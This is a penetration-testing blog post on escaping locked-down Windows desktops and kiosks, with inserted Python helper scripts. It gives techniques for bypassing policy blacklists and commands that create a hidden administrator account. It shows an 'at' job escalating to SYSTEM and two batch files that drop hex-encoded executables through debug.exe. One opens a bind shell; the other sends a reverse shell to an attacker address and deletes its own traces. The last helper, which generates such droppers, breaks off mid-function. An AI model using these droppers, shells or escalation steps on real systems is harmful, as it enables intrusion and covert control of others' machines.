Bypassing Restricted Environments

I just got an email from an old student who is doing a pentest, and he asked me about pentesting restricted environments like locked-down desktops, Citrix, kiosks, etc. I figured I'd put together a blog post on the subject, and if people like it I'll do some more posts that go deeper and cover things like bypassing Software Restriction Policy (SRP) and breaking out of sandboxes. So here goes.....

 

Windows Environments

There are a lot of different ways to lock down a Windows environment.  Probably the most widely used method is Group Policy.  Group Policy is basically a set of rules that govern the environment (restricting access to certain programs, tools, folders, etc.).  Under the hood most of those rules are just registry values under the Policies keys (HKCU and HKLM\Software\Microsoft\Windows\CurrentVersion\Policies, and HKLM\Software\Policies) that the shell, Task Manager, cmd.exe and friends consult before they do anything, which is why the tricks below all come down to finding a program that is still allowed to run and has some way of launching something else.
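Before trying any of the tricks below it helps to know exactly which restrictions are in force, because each bypass only matters if the matching policy is set (DisableCMD=2, for example, blocks the interactive prompt but still lets batch files like the ones later in this post run). The following Python script is an added example and is not part of the original post: on Windows it reads the documented policy locations from the registry and explains them in plain words, and the interpret() function also works offline against a snapshot dictionary, so the same logic can be run anywhere. The demo snapshot at the bottom is constructed, not taken from a real machine.

```python
"""Enumerate common Group Policy lockdowns and say what each one blocks.

Added example (not from the original post).  Registry locations and value
meanings come from the administrative templates / winsafer.h; the sample
snapshot at the bottom is constructed for illustration.
"""
import sys

POLICY_SYSTEM = r"Software\Microsoft\Windows\CurrentVersion\Policies\System"
POLICY_EXPLORER = r"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
SAFER = r"SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers"

# SAFER_LEVELID_* from winsafer.h: the SRP default security level.
SAFER_LEVELS = {0x40000: "Unrestricted", 0x20000: "Basic User",
                0x10000: "Constrained", 0x1000: "Untrusted", 0: "Disallowed"}

# Simple on/off policies: (key, value name, what is taken away when set to 1).
ON_OFF = [
    (POLICY_SYSTEM, "DisableTaskMgr", "Task Manager"),
    (POLICY_SYSTEM, "DisableRegistryTools", "regedit"),
    (POLICY_EXPLORER, "NoRun", "Start > Run box"),
    (POLICY_EXPLORER, "NoControlPanel", "Control Panel"),
    (POLICY_EXPLORER, "NoFolderOptions", "Folder Options"),
    (POLICY_EXPLORER, "NoDesktop", "desktop icons"),
]


def interpret(snapshot):
    """snapshot maps 'HKCU\\<key>' or 'HKLM\\<key>' to {value name: data}.
    Returns a list of plain-English findings (empty = nothing checked is set)."""
    findings = []
    for hive in ("HKCU", "HKLM"):
        system = snapshot.get(f"{hive}\\{POLICY_SYSTEM}", {})
        explorer = snapshot.get(f"{hive}\\{POLICY_EXPLORER}", {})
        # DisableCMD is three-valued: 1 kills cmd.exe and .bat/.cmd files,
        # 2 kills the interactive prompt but still lets batch files run.
        cmd = system.get("DisableCMD", 0)
        if cmd == 1:
            findings.append(f"{hive}: cmd.exe and batch files disabled (DisableCMD=1)")
        elif cmd == 2:
            findings.append(f"{hive}: cmd.exe disabled but batch files still run (DisableCMD=2)")
        for key, name, what in ON_OFF:
            values = system if key == POLICY_SYSTEM else explorer
            if values.get(name) == 1:
                findings.append(f"{hive}: {what} disabled ({name}=1)")
        # DisallowRun / RestrictRun are flags; the program lists live in a
        # subkey of the same name with values named 1, 2, 3... holding image names.
        for flag, kind in (("DisallowRun", "blacklist"), ("RestrictRun", "whitelist")):
            if explorer.get(flag) == 1:
                names = sorted(snapshot.get(f"{hive}\\{POLICY_EXPLORER}\\{flag}", {}).values())
                findings.append(f"{hive}: {kind} of programs by image name: {', '.join(names) or '(empty)'}")
    safer = snapshot.get(f"HKLM\\{SAFER}", {})
    if "DefaultLevel" in safer:
        level = safer["DefaultLevel"]
        findings.append(f"SRP default level: {SAFER_LEVELS.get(level, hex(level))}")
    return findings


def read_live():
    """Take the same snapshot from the live registry (Windows only)."""
    import winreg  # only importable on Windows
    roots = {"HKCU": winreg.HKEY_CURRENT_USER, "HKLM": winreg.HKEY_LOCAL_MACHINE}
    keys = [POLICY_SYSTEM, POLICY_EXPLORER, POLICY_EXPLORER + r"\DisallowRun",
            POLICY_EXPLORER + r"\RestrictRun", SAFER]
    snapshot = {}
    for hive, root in roots.items():
        for key in keys:
            try:
                with winreg.OpenKey(root, key) as handle:
                    values = {}
                    for i in range(winreg.QueryInfoKey(handle)[1]):
                        name, data, _type = winreg.EnumValue(handle, i)
                        values[name] = data
                    snapshot[f"{hive}\\{key}"] = values
            except OSError:
                continue  # key absent means the policy is not configured
    return snapshot


def demo_snapshot():
    """Constructed sample: a kiosk with a blacklist and no SRP (not real data)."""
    return {
        f"HKCU\\{POLICY_SYSTEM}": {"DisableCMD": 2, "DisableTaskMgr": 1},
        f"HKCU\\{POLICY_EXPLORER}": {"NoRun": 1, "DisallowRun": 1},
        f"HKCU\\{POLICY_EXPLORER}\\DisallowRun": {"1": "cmd.exe", "2": "regedit.exe"},
        f"HKLM\\{SAFER}": {"DefaultLevel": 0x40000},
    }


if __name__ == "__main__":
    snap = read_live() if sys.platform == "win32" else demo_snapshot()
    for line in interpret(snap) or ["no checked restrictions found"]:
        print(line)
```

Nothing here needs administrator rights: the policy keys are readable by ordinary users even when regedit itself is disabled, because DisableRegistryTools only stops the regedit binary, not the registry API.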

 

Opening Windows folders with Internet Explorer

Chances are most key programs and functions that would allow any sort of noteworthy access are blocked in a corporate or public environment.  Luckily, Internet Explorer is almost never blocked, because it is a vital part of business functionality.  Here we will use the shell: URL handler to reach Windows folders through Internet Explorer.  If you enter a shell:<folder name> string into the URL bar of IE, an instance of explorer.exe will spawn and browse to the specified special folder, even when Explorer itself cannot be reached from the Start Menu.  Note that these strings work with Internet Explorer ONLY; other browsers will not hand a shell: URL to the Windows shell.

 

Here are some examples of different commands (type each one into the IE URL bar and press Enter):

shell:profile: This command will open up the profile folder of whatever account you are logged in as.

image001

shell:programfiles: Here, the command will open up the Program Files folder.

image002

shell:system: Here, we can open up the system32 folder.

image003

shell:controlpanelfolder: This command opens up the Control Panel.

image004

shell:windows: Finally, we can open up the WINDOWS folder with this command.

image005

Another way to navigate to the Control Panel folder is by entering its CLSID into the URL bar:  shell:::{21EC2020-3AEA-1069-A2DD-08002B30309D}

The shell::: prefix followed by a CLSID in braces opens that shell namespace object directly, so it is a handy fallback when the friendly name is filtered but the GUID is not.

image006

 

 

 

Accessing cmd.exe through the Microsoft Help and Support Center (this works on Windows XP and Windows 2003, not on Windows 7, which no longer ships the Help and Support Center)

If access to cmd.exe through ordinary means has been disabled, there is another way of getting at it.  This technique uses the Help and Support Center to spawn a command prompt for user interaction.  To do this, simply enter the following into the URL bar in Internet Explorer:

hcp://

That is the Help and Support Center protocol handler, and the window that opens is the Help and Support Center:

image007

As you can see, the Help and Support Center window has spawned.  Next, type “Command Prompt” into the search bar and hit Enter.  On the left-hand side of the window under Suggested Topics you will see a result called “Using Command Prompt”; click it.

image008

Finally, click on the highlighted link named “Command Prompt” and voila, you have a shell!

image009

 


 

 

Defeating Blacklists

In some cases Windows Explorer will have been completely blacklisted and you may not be able to get to it from the Start Menu.  Again, we can use Internet Explorer to spawn an explorer.exe window and have it navigate to a specific file location.  Here is an example of this relatively simple technique:

By typing C:\windows into the URL bar we can open the WINDOWS folder on the C: drive.

image010

In certain situations the literal string C:\windows may itself be filtered.  Luckily, the URL parser is forgiving, so any of the following spellings of the same path will do; simply enter any of them into the URL bar to achieve the same result:

File:/C:/windows

File:/C:\windows\

File:/C:\windows/

File:/C:/windows

File://C:/windows

File://C:\windows/

file://C:\windows

C:/windows

 C:/windows/

C:/windows\

%WINDIR%

 

 

Using the same technique, you can also enter environment variables into the URL bar; IE expands them and jumps to the folder they point to.  The paths on the right are for a Windows XP/2003 machine logged on as Administrator:

 

Command          Jumps to
-------------    -----------
%TMP%            C:\Documents and Settings\Administrator\Local Settings\Temp
%TEMP%           C:\Documents and Settings\Administrator\Local Settings\Temp
%SYSTEMDRIVE%    C:\
%SYSTEMROOT%     C:\WINDOWS
%APPDATA%        C:\Documents and Settings\Administrator\Application Data
%HOMEDRIVE%      C:\
%HOMESHARE%      UNC path of your server-based home directory (only set when one is configured)

 

 

Create a new user and add them to the Administrators group

This is a simple task; it consists of 2 commands.  The syntax for creating a new user is net user <username> <password> /add.  The syntax for then adding that user to a local group is net localgroup <group> <username> /add (localgroup is its own net subcommand, not an option of net user).  Both commands need to be run from an account that is already a local administrator.  So in this example we create a user called secure with the password ninja, then add that user to the Administrators group:

net user secure ninja /add

net localgroup Administrators secure /add

image011

 

 

Simple privilege escalation (doesn't work in Windows Vista/7 and above, where session 0 isolation keeps the SYSTEM window off your desktop)

Here we are going to go from a local Administrator account up to a SYSTEM-level account with a few simple tricks.  The at command only works for members of the local Administrators group, so this is not a jump from a plain user: it turns an admin desktop into a SYSTEM desktop.  First, open a command prompt and type “at”.  If the command errors out with “Access is denied” then you know this escalation technique will not work for you, but if it comes back with “There are no entries in the list.” (or a list of existing jobs), then this method is sure to work:

 

image012

 

So, now that we know this will work, we need to schedule a job.  Here we are going to schedule an interactive command shell to spawn.  Pick a time a minute or two ahead of the machine's current local time (check it with the time command; at takes HH:MM in 24-hour format, and a time that has already passed is scheduled for tomorrow):

at 20:10 /interactive "cmd.exe"

or

SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10 /RU SYSTEM

Without /RU SYSTEM, schtasks creates the task under your own account and the shell it spawns has no more rights than you already have; at always runs its jobs as LocalSystem, which is the whole point here.

image013

After the shell has been spawned, notice that the title bar does not say cmd.exe but svchost.exe.  That is because it was spawned by the Task Scheduler service, which runs under the Local System account:

image014

 

Now that we have a command shell running with system privileges, let’s shed this user environment.  Go ahead and Ctrl+Alt+Delete to the task manager and under the processes tab, find explorer.exe and kill the process:

image015

 

You will notice that the desktop has disappeared.  Next go back to the system command shell and type in “explorer.exe”.  This will spawn a new desktop environment, which because it was spawned from a system level command shell, will be a system level environment:

image016

 

 

Creating a program that binds a shell to a port using a batch file

Here we are going to use a batch file to create an executable that binds a command shell to a specified port.  This is nice because it is relatively quick and all you have to do is run the batch file; the rest is automatic.  So, before we get started let’s have a look at the code:

 

 

echo off && echo n 1.dll >123.hex && echo e 0100 >>123.hex

echo 4d 5a 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 00 00 50 45 00 00 4c 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 00 00 00 02 00 00 00 00 00 00 00 00 00 00 67 42 00 00 10 00 00 00 00 10 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 00 00 00 02 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00  >>123.hex

echo e 0180 >>123.hex && echo 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 63 42 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  >>123.hex

echo e 0200 >>123.hex && echo 00 00 00 00 00 00 00 00 4d 45 57 00 46 12 d2 c3 00 30 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 c0 02 d2 75 db 8a 16 eb d4 00 10 00 00 00 40 00 00 77 02 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 c0 be 1c 40 40 00 8b de ad ad 50 ad 97 b2 80 a4 b6 80 ff 13 73 f9 33 c9 ff 13 73 16 33 c0 ff 13 73 21 b6 80 41 b0 10 ff 13  >>123.hex

echo e 0280 >>123.hex && echo 12 c0 73 fa 75 3e aa eb e0 e8 72 3e 00 00 02 f6 83 d9 01 75 0e ff 53 fc eb 26 ac d1 e8 74 2f 13 c9 eb 1a 91 48 c1 e0 08 ac ff 53 fc 3d 00 7d 00 00 73 0a 80 fc 05 73 06 83 f8 7f 77 02 41 41 95 8b c5 b6 00 56 8b f7 2b f0 f3 a4 5e eb 9b ad 85 c0 75 90 ad 96 ad 97 56 ac 3c 00 75 fb ff 53 f0 95 56 ad 0f c8 40 59 74 ec 79 07 ac 3c 00 75 fb 91 40 50 55 ff 53 f4 ab 75 e7 c3 00 00 00 00 00  >>123.hex

echo e 0300 >>123.hex && echo 33 c9 41 ff 13 13 c9 ff 13 72 f8 c3 38 42 00 00 45 42 00 00 00 00 00 00 00 40 40 00 30 01 40 00 00 10 40 00 00 10 40 00 68 1c fa 31 40 03 6a 01 e8 fc 86 02 f9 f5 30 ba 18 fc fb bf 14 b2 c7 1f 6a 91 02 06 bd 3c 0c 02 e8 b0 23 a3 60 f6 59 66 c7 05 58 ce 4f 02 15 3a 19 e8 d8 5d 50 d9 aa 86 3d 66 a3 5a 31 c8 3c 5c a0 01 14 6a 10 68 29 14 ff 35 36 14 e8 82 12 29 05 0d 94 81 5e d0 0f ca  >>123.hex

echo e 0380 >>123.hex && echo 60 5c c5 a1 1e 05 88 3c 30 be c2 2a 44 51 45 04 ea 2d 14 fe 28 9f 42 68 48 93 a9 45 31 46 fb 28 e1 08 a5 8b 0b 85 46 14 e8 26 5f 07 c3 cc ff 25 20 1a 81 bb 2a 14 06 43 0c 21 1c 90 18 c8 10 64 04 4e cc 20 55 8b ec 81 c4 3f 7c fe f1 0c 56 57 e8 3a c7 89 03 45 fc 33 c9 8b 75 a9 ac 3c c0 74 07 e8 22 f2 f7 03 41 eb f4 51 d1 e9 90 e1 58 3b 01 c1 74 0b 5f 5e b8 03 10 c9 c2 08 e1 86 49 8d  >>123.hex

echo e 0400 >>123.hex && echo bd 3c 70 e5 43 2a 09 cf 2f e0 02 b0 20 aa eb 73 f2 28 8d 85 15 39 8b f0 36 f8 33 2a 33 eb 1b 8b 03 66 32 07 ef 22 65 20 4d fe 22 11 e1 28 2d ed 94 08 83 b9 dc b7 30 4b 74 fb 3b 3a 4d 08 a8 15 59 65 1d 67 0a 4c 13 41 1d 0f 14 eb e6 aa 0d 36 07 19 87 48 f4 9d 7f c0 55 73 11 8b 7d 0c c6 17 b8 02 7f 82 a2 13 9d 68 b0 a0 58 34 33 0d 46 0d e6 d1 f7 e1 fe 58 a3 ee e7 44 bb 1f 16 a9 ce 11  >>123.hex

echo e 0480 >>123.hex && echo 04 de 55 01 3c d4 14 d4 0e 1b 33 c0 4e ec 87 0b 70 d2 8a 06 46 3d 3c 02 b3 12 0e f7 df 90 eb 0b 2c 30 19 8d 0c 89 06 48 83 2d 0a c0 75 f1 e8 04 11 33 51 c2 38 a8 92 52 e1 06 00 00 30 40 00 63 30 6d 64 00 81 3f 40 00 0c 38 20 40 03 77 73 32 5f 33 98 2e 64 6c e3 c0 80 61 71 63 1b 65 70 74 10 e1 69 73 db ca 6e 01 57 53 41 cb f9 61 72 f0 75 70 cf 18 68 23 6f 6e 73 1d 0e 62 69 94 64 19  >>123.hex

echo e 0500 >>123.hex && echo 9f c3 63 6b 65 74 bf 06 ff 03 e1 b1 91 1a 72 6e cd 6c 58 4a 47 c3 36 43 6f 6d 8b 61 37 5a 4c 62 cc 4c 80 fc 72 ed f7 3b a8 50 6f 6c ce 73 3b 21 00 00 00 00 00 00 81 3f 40 00 4c 6f 61 64 4c 69 62 72 61 72 79 41 00 47 65 74 50 72 6f 63 41 64 64 72 65 73 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 40 00 00 e9 ec be ff ff 00 00 00 02 00 00 00 0c 40 00 00  >>123.hex

echo r cx >>123.hex && echo 0477 >>123.hex && echo w >>123.hex && echo q >>123.hex && debug<123.hex && copy 1.dll bind.exe && del 1.dll && del 123.hex

rem *********CHANGE PORT NUMBER HERE******

bind.exe 8080

IF EXIST bind.exe GOTO kill

del %0

:kill

 

What is happening here is that the echo lines write a script for debug.exe (123.hex): n 1.dll names the output file, each e line enters a run of bytes starting at offset 0100, r cx followed by 0477 sets the file length (0x477 bytes) and w writes the file out; debug<123.hex then feeds that script to DEBUG.  The output is not really a DLL.  DEBUG refuses to write files with an .exe or .hex extension, so the binary is written as 1.dll and then copied to bind.exe.  Once created, bind.exe is executed and begins listening on a port (in this case port 8080, but you can and should change it to whatever port is necessary in the situation).  After that the script tidies up: 1.dll and 123.hex are no longer needed once bind.exe exists (the reverse-shell script below deletes its equivalents right after the copy; make sure this one does the same), and del %0 removes the batch file itself.  Note that del %0 is only reached when bind.exe is gone, because the IF EXIST bind.exe GOTO kill line jumps past it otherwise, so “deletes any trace of evidence” is optimistic: if bind.exe is still on disk, so is the batch file.  Two more caveats: debug.exe is a 16-bit DOS program, so this trick only works on 32-bit Windows (64-bit Windows does not ship it), and the space before each >> is not cosmetic, since a digit directly in front of > (as in echo 0477>>123.hex) can be taken by cmd as a file-handle number for the redirection.

 

Okay, so once we run the batch file we can see the executable being created.  (If you run it from a command prompt you will see it in action; if you just double-click the batch file, the command prompt window will open and close very quickly.)  Here it is being run from the command prompt so you can see the output:

image017

 

Next, let’s check the active connections and listening sockets with netstat -ano (the -o column is the owning PID, which is what lets us match the socket to a process):

image018

 

And there she is, waiting on port 8080.  Just to be sure, let’s run tasklist and confirm that the PID from netstat belongs to bind.exe:

image019
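The two checks above (netstat -ano, then tasklist to see which image owns the PID) are easy to do by eye for one port, but on a real box there are dozens of sockets. The following Python script is an added example and not part of the original post: it parses both outputs, maps every listening port to its owning image name, and lists the established connections so you can see who is on the other end of a bound shell. The two text samples are constructed to look like XP-era output (PIDs and addresses are made up); live() runs the real commands on Windows.

```python
"""Cross-reference 'netstat -ano' and 'tasklist' to see which image owns each
listening port, the check the post does by eye after dropping bind.exe.

Added example, not part of the original post.  The two samples below are
constructed to look like XP-era output (PIDs and addresses are made up).
"""
import re
import subprocess

NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       948
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       1724
  TCP    192.168.3.177:8080     192.168.3.20:49152     ESTABLISHED     1724
  UDP    0.0.0.0:445            *:*                                    4
"""

TASKLIST_SAMPLE = """\
Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0         28 K
System                         4 Console                 0        236 K
svchost.exe                  948 Console                 0      4,852 K
explorer.exe                1460 Console                 0     18,204 K
bind.exe                    1724 Console                 0        852 K
"""

# Image names may contain spaces ("System Idle Process"), so match from the right.
TASKLIST_ROW = re.compile(r"^(?P<image>.+?)\s+(?P<pid>\d+)\s+\S+\s+\d+\s+[\d,]+ K\s*$")


def parse_netstat(text):
    """Return (proto, local_ip, local_port, foreign, state, pid) per socket line.
    UDP lines have no State column, so they have 4 fields instead of 5."""
    rows = []
    for line in text.splitlines():
        tokens = line.split()
        if len(tokens) < 4 or tokens[0] not in ("TCP", "UDP"):
            continue
        proto, local, foreign = tokens[:3]
        state = tokens[3] if len(tokens) == 5 else ""
        pid = int(tokens[-1])
        ip, port = local.rsplit(":", 1)   # rsplit also copes with [::]:135
        rows.append((proto, ip, int(port), foreign, state, pid))
    return rows


def parse_tasklist(text):
    """Map PID -> image name."""
    pids = {}
    for line in text.splitlines():
        m = TASKLIST_ROW.match(line)
        if m:
            pids[int(m.group("pid"))] = m.group("image")
    return pids


def listeners(netstat_text, tasklist_text):
    """Map (proto, port) -> (pid, image) for every TCP LISTENING and UDP socket."""
    pids = parse_tasklist(tasklist_text)
    out = {}
    for proto, _ip, port, _foreign, state, pid in parse_netstat(netstat_text):
        if proto == "UDP" or state == "LISTENING":
            out[(proto, port)] = (pid, pids.get(pid, "?"))
    return out


def established(netstat_text, tasklist_text):
    """List (port, peer, pid, image) for connected TCP sockets, i.e. who is on
    the far end of a bound or reverse shell right now."""
    pids = parse_tasklist(tasklist_text)
    return [(port, foreign, pid, pids.get(pid, "?"))
            for proto, _ip, port, foreign, state, pid in parse_netstat(netstat_text)
            if proto == "TCP" and state == "ESTABLISHED"]


def live():
    """Run the real commands (Windows only) and return listeners and connections."""
    ns = subprocess.run(["netstat", "-ano"], capture_output=True, text=True).stdout
    tl = subprocess.run(["tasklist"], capture_output=True, text=True).stdout
    return listeners(ns, tl), established(ns, tl)


if __name__ == "__main__":
    for (proto, port), (pid, image) in sorted(listeners(NETSTAT_SAMPLE, TASKLIST_SAMPLE).items()):
        print(f"{proto} {port:>5}  pid {pid:>5}  {image}")
    for port, peer, pid, image in established(NETSTAT_SAMPLE, TASKLIST_SAMPLE):
        print(f"port {port} connected from {peer} ({image}, pid {pid})")
```

The same parser works from the defender's chair: run it on a schedule and diff the listeners() result against the last run, and a new (TCP, 8080) -> bind.exe entry stands out immediately.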

 

Okay, now that we know the batch file worked and we can see that bind.exe is running and listening, let’s hop onto our evil Linux machine and see if we can get access.  We simply netcat to the target machine (here using 192.168.3.177 as its IP address) on port 8080 and…

image020

 

Success!  We have a shell.  Now all that was done here was send a message to all users logged on to the machine, but I’ll let your imagination run wild with the possibilities of having Administrator access… you evil hacker, you.

 

Sending a reverse shell using a batch file

 

Here we are going to essentially do the same thing as we did in the last exercise, but instead of using the attacker machine to go and connect to the target machine, we are going to have the target machine send a shell to the attacker machine.

 

Let’s take a look at the code:

 

echo off && echo n 2.dll >1234.hex

echo e 0100 >>1234.hex && echo 4d 5a 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 00 00 50 45 00 00 4c 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 00 00 00 02 00 00 00 00 00 00 00 00 00 00 df 42 00 00 10 00 00 00 00 10 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 00 00 00 02 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00  >>1234.hex

echo e 0180 >>1234.hex && echo 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 db 42 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  >>1234.hex

echo e 0200 >>1234.hex && echo 00 00 00 00 00 00 00 00 4d 45 57 00 46 12 d2 c3 00 30 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 c0 02 d2 75 db 8a 16 eb d4 00 10 00 00 00 40 00 00 ef 02 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 c0 be 1c 40 40 00 8b de ad ad 50 ad 97 b2 80 a4 b6 80 ff 13 73 f9 33 c9 ff 13 73 16 33 c0 ff 13 73 21 b6 80 41 b0 10 ff 13  >>1234.hex

echo e 0280 >>1234.hex && echo 12 c0 73 fa 75 3e aa eb e0 e8 72 3e 00 00 02 f6 83 d9 01 75 0e ff 53 fc eb 26 ac d1 e8 74 2f 13 c9 eb 1a 91 48 c1 e0 08 ac ff 53 fc 3d 00 7d 00 00 73 0a 80 fc 05 73 06 83 f8 7f 77 02 41 41 95 8b c5 b6 00 56 8b f7 2b f0 f3 a4 5e eb 9b ad 85 c0 75 90 ad 96 ad 97 56 ac 3c 00 75 fb ff 53 f0 95 56 ad 0f c8 40 59 74 ec 79 07 ac 3c 00 75 fb 91 40 50 55 ff 53 f4 ab 75 e7 c3 00 00 00 00 00  >>1234.hex

echo e 0300 >>1234.hex && echo 33 c9 41 ff 13 13 c9 ff 13 72 f8 c3 b0 42 00 00 bd 42 00 00 00 00 00 00 00 40 40 00 30 01 40 00 00 10 40 00 00 10 40 00 68 1c 06 32 40 07 6a 01 e8 0e 7c 38 55 0c e8 42 02 c8 15 38 9e 6a 7e 38 ea 53 0c 7a 50 2c 16 74 41 30 fd 01 bf 55 b2 b1 33 6a 91 02 06 b2 7c 55 9a 27 a3 78 83 66 c7 05 64 7b 4f a6 38 67 bc 5d 50 66 94 3d 39 66 a3 68 7e 64 66 7e 21 7d 8b 73 0c d9 0a 6a 68 94 2d a1  >>1234.hex

echo e 0380 >>1234.hex && echo 3a 7a 6f 48 15 ea 4c 05 11 50 64 90 10 4d 44 55 91 14 3c 40 78 6a 28 10 68 5d 28 ff 35 30 74 e8 a4 9e 51 54 55 a1 55 8d bf 6e 0e 0a 08 90 22 0b e1 51 14 e8 1f 81 4b c3 ff 25 24 20 bb 6f 2a 1c 06 43 18 21 14 bd c3 22 08 71 cc 01 55 8b ec 81 c4 7c fe ff 88 56 57 e8 60 ac dd 89 45 fc 33 1d c9 8b 75 7e 38 3c 1d 74 07 1e 22 40 f7 41 eb f4 51 d1 72 e9 00 e1 58 3b c1 74 0b 5f 5e 30 b8 03  >>1234.hex

echo e 0400 >>1234.hex && echo b9 c9 c2 08 e1 86 49 8d bd 3c 70 e5 43 2a 09 cf 2f e0 02 b0 20 aa eb 73 f2 28 8d 85 15 39 8b f0 36 f8 33 2a 33 eb 1b 8b 03 66 32 07 ef 22 65 20 4d fe 22 11 e1 28 2d ed 94 08 83 b9 dc b7 30 4b 74 fb 3b 3a 4d 08 a8 15 59 65 1d 67 0a 4c 13 41 1d 0f 14 eb e6 aa 0d 36 07 19 87 38 f4 b0 7f c0 55 73 11 8b 7d 0c c6 17 b8 02 7f 82 a2 13 9d 68 b0 a0 58 34 33 0d 46 0d e6 d1 f7 e1 fe 58 a3 ee  >>1234.hex

echo e 0480 >>1234.hex && echo e7 44 bb 1f 16 a9 ce 11 04 de 55 01 3c d4 14 d4 0e 1b 33 c0 4e ec 87 0b 70 d2 8a 06 46 3d 3c 02 b3 12 0e f7 df 90 eb 0b 2c 30 19 8d 0c 89 06 48 83 2d 0a c0 75 f1 e8 04 11 33 51 c2 38 e2 30 83 c4 07 f4 6a f5 e8 69 09 19 49 ff bd 82 aa 20 0b d0 2a 93 75 37 f8 50 22 9d 29 86 06 fc e8 4d 2f 68 8b 24 38 e6 53 1a 0f 08 8d 50 03 21 18 83 c0 04 e3 f9 ff fe 80 02 f7 d3 23 cb 81 e1 44 80 74  >>1234.hex

echo e 0500 >>1234.hex && echo 7c e9 6c c1 0c 60 75 77 06 f4 10 c0 40 02 d0 e1 1b c2 51 5b 3a 47 c4 49 19 ca 0c 57 06 08 30 00 00 30 40 00 63 30 6d 64 00 66 3f 40 00 14 38 20 40 03 77 73 32 5f 33 98 2e 64 6c e3 c0 80 67 07 65 74 68 6f 73 40 62 79 6e 61 7b 6d cf 1e 63 9e 3c f7 eb ff 0e 12 57 53 41 5d cf 61 72 46 75 70 18 79 68 ca 2c 73 13 4f 26 63 6b 62 ef c1 ff b8 03 6c 95 1a 72 ca 5e 6c 4c c7 57 d3 69 74 f3 46  >>1234.hex

echo e 0580 >>1234.hex && echo a7 bc 91 47 c3 4c 43 6f 6d 88 61 6e 64 36 4c 69 44 62 7e 80 76 72 fb 9d 3a 50 b7 82 e7 73 15 41 58 21 c0 64 48 d0 43 2f 60 00 00 00 00 00 66 3f 40 00 4c 6f 61 64 4c 69 62 72 61 72 79 41 00 47 65 74 50 72 6f 63 41 64 64 72 65 73 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 40 00 00 e9 74 be ff ff 00 00 00 02 00 00 00 0c 40 00 00  >>1234.hex

echo r cx >>1234.hex && echo 04ef >>1234.hex && echo w >>1234.hex && echo q >>1234.hex && debug<1234.hex && copy 2.dll reverse.exe && del 2.dll && del 1234.hex

rem *******************EDIT YOUR HOSTNAME AND PORT HERE*************************

reverse.exe 192.168.2.18 31337

:deleteit

del reverse.exe

IF EXIST reverse.exe GOTO kill

del %0

:kill

image021

The code looks very similar to bind.bat from the last exercise and does the same thing: the echo lines build a DEBUG script (1234.hex) that writes the executable out as 2.dll, which is then copied to reverse.exe, after which the two temporary files are deleted.  reverse.exe is run with the attacker's address and port (edit the line under the rem comment first), sends the shell, and is deleted when it exits.  As in bind.bat, del %0 only runs if the executable was successfully removed, because the IF EXIST line jumps to :kill otherwise.

 

First off, we need to set our evil hacker box to listen on a port, let’s choose 31337 for this exercise.  We will be using netcat again (isn’t it a wonderful tool) to listen on port 31337:

image022

Next, we simply run the batch file on the target machine:

image023

And like clockwork, there is our shell!

image024
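Both batch files above are really the same trick: a DEBUG script smuggled in through echo that writes an executable under a harmless name and copies it. Rather than hand-editing the hex, the following Python helper, an added example that is not part of the original post, generates such a script from any binary, parses one back into bytes (so you can check what a script you found on a box actually drops), and wraps the result in the echo >> idiom the two batch files use. The file name 1.dll, the 16-bytes-per-line layout and the size check are my own choices.

```python
"""Generate, and parse back, the DEBUG.EXE scripts that bind.bat and
reverse.bat above use to drop an executable with nothing but echo and debug.

Added example, not part of the original post.  The 16-byte-per-line layout,
the temporary file name and the size limit are my choices (see comments).
"""

# DEBUG loads the file at CS:0100 inside one 64 KiB segment, so a single
# 'w' with only CX set can write at most 0x10000 - 0x100 bytes.
MAX_SIZE = 0x10000 - 0x100


def make_debug_script(data: bytes, tmp_name: str = "1.dll", per_line: int = 16) -> str:
    """Return the text to feed to 'debug < script.hex'.

    DEBUG's w command refuses to write .EXE and .HEX files, which is why the
    post names the output 1.dll / 2.dll and copies it afterwards.
    """
    if not data or len(data) > MAX_SIZE:
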